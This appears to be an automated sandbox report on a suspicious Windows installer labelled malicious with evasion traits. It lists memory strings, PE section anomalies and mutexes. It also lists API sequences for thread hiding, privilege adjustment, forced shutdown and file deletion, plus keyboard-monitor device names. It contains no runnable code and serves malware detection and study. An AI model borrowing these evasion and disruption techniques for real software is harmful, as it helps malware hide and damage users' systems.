Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0J
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0A
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0H
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0I
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://ocsp.digicert.com0X
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://www.digicert.com/CPS0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004370000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000002.1925104942.000000006CA96000.00000008.00000001.01000000.00000009.sdmp, updat4.vac.6.dr, 7zr.exe.6.dr, update.vac.6.dr, update.vac.1.dr | String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr | String found in binary or memory: http://www.metalinker.org/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr | String found in binary or memory: http://www.metalinker.org/basic_string::_M_construct
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr | String found in binary or memory: https://aria2.github.io/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr | String found in binary or memory: https://aria2.github.io/Usage:
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr | String found in binary or memory: https://github.com/aria2/aria2/issues
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.dr | String found in binary or memory: https://github.com/aria2/aria2/issuesReport
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | String found in binary or memory: https://jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | String found in binary or memory: https://www.innosetup.com/
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F64B000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.0000000003460000.00000004.00001000.00020000.00000000.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000000.1706263818.0000000000A01000.00000020.00000001.01000000.00000004.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000006.00000000.1769046154.0000000000F4D000.00000020.00000001.01000000.00000008.sdmp, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr, #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | String found in binary or memory: https://www.remobjects.com/ps

Operating System Destruction

Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Process information set: 01 00 00 00

System Summary

Source: update.vac.1.dr | Static PE information: section name: .j)q
Source: update.vac.6.dr | Static PE information: section name: .j)q
Source: updat4.vac.6.dr | Static PE information: section name: .j)q
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA63F30 NtSetInformationThread,OpenSCManagerA,CloseServiceHandle,OpenServiceA,CloseServiceHandle
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E3886 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E3C62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E3D18 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E3D62 NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E39CF NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E3A6A NtSetInformationThread,GetCurrentThread,NtSetInformationThread
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA64B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E1950: CreateFileA,DeviceIoControl,CloseHandle
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6C8E4754 _strlen,CreateFileA,CreateFileA,CloseHandle,_strlen,std::ios_base::_Ios_base_dtor,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,_strlen,TerminateProcess,GetCurrentProcess,TerminateProcess,_strlen,Sleep,ExitWindowsEx,Sleep,DeleteFileA,Sleep,_strlen,DeleteFileA,Sleep,_strlen,std::ios_base::_Ios_base_dtor
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Process token adjusted: Security
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: String function: 6CA97240 appears 31 times
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: String function: 6CB34F10 appears 415 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 00381E40 appears 84 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 003828E3 appears 34 times
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: String function: 0041FB10 appears 720 times
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.5.dr | Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp.0.dr | Static PE information: Number of sections : 11 > 10
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000000.1702203686.00000000002F9000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704203075.000000000357E000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe, 00000000.00000003.1704613298.000000007F94A000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Binary or memory string: OriginalFileNameSRClient.exe vs #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: tProtect.dll.12.dr | Binary string: \Device\TfSysMon
Source: tProtect.dll.12.dr | Binary string: \Device\TfKbMonPWLCache
Source: classification engine | Classification label: mal80.evad.winEXE@146/32@0/0
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA64B80 OpenProcessToken,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,NtInitiatePowerAction
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00389313 _isatty,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00393D66 __EH_prolog,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
Source: C:\Program Files (x86)\Windows NT\7zr.exe | Code function: 10_2_00389252 DeviceIoControl,GetModuleHandleW,GetProcAddress,GetDiskFreeSpaceW
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | Code function: 6_2_6CA64050 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,Process32NextW
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp | File created: C:\Program Files (x86)\Windows NT\is-G3Q97.tmp
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8064:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7144:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7688:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8156:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2060:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7340:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:3760:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1456:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7456:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5596:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7384:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7952:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7936:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7800:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7432:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7788:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:2416:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7596:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7528:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:1868:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8132:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6020:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8072:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7544:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7504:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7576:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:8004:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7808:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:7672:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \BaseNamedObjects\Local\SM0:5548:120:WilError_03
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeFile created: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmpJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-VOKMN.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-0LRJ5.tmp\#U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganizationJump to behavior
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: SELECT data FROM %Q.'%q_node' WHERE nodeno=?Node %lld missing from databaseNode %lld is too small (%d bytes)Rtree depth out of range (%d)Node %lld is too small for cell count of %d (%d bytes)Dimension %d of cell %d on node %lld is corruptDimension %d of cell %d on node %lld is corrupt relative to parentwrong number of arguments to function rtreecheck()SELECT * FROM %Q.'%q_rowid'Schema corrupt or not an rtree_rowid_parentENDSELECT count(*) FROM %Q.'%q_%s'cannot open value of type %sno such rowid: %lldforeign keyindexedcannot open virtual table: %scannot open table without rowid: %scannot open view: %sno such column: "%s"cannot open %s column for writingblockDELETE FROM %Q.'%q_data';DELETE FROM %Q.'%q_idx';DELETE FROM %Q.'%q_docsize';version%s_nodedata_shape does not contain a valid polygon
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: SELECT %s WHERE rowid = ?SELECT rowid, rank FROM %Q.%Q ORDER BY %s("%w"%s%s) %sinvalid rootpageorphan indexsqlite_stat%dDELETE FROM %Q.%s WHERE %s=%QDELETE FROM %Q.sqlite_master WHERE name=%Q AND type='trigger'corrupt schemaUPDATE %Q.sqlite_master SET rootpage=%d WHERE #%d AND rootpage=#%dstattable %s may not be droppeduse DROP TABLE to delete table %suse DROP VIEW to delete view %stblDELETE FROM %Q.sqlite_sequence WHERE name=%QDELETE FROM %Q.sqlite_master WHERE tbl_name=%Q and type!='trigger' UNIQUEindexcannot create a TEMP index on non-TEMP table "%s"table %s may not be indexedviews may not be indexedvirtual tables may not be indexedthere is already a table named %sindex %s already existssqlite_autoindex_%s_%dexpressions prohibited in PRIMARY KEY and UNIQUE constraintsconflicting ON CONFLICT clauses specifiedCREATE%s INDEX %.*sINSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);name='%q' AND type='index'table "%s" has more than one primary keyAUTOINCREMENT is only allowed on an INTEGER PRIMARY KEYTABLEVIEW
Source: #U8f6f#U4ef6#U5305#U5b89#U88c5#U7a0b#U5e8f_1.0.4.tmp, 00000001.00000003.1765086570.0000000004819000.00000004.00001000.00020000.00000000.sdmp, is-7F262.tmp.6.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
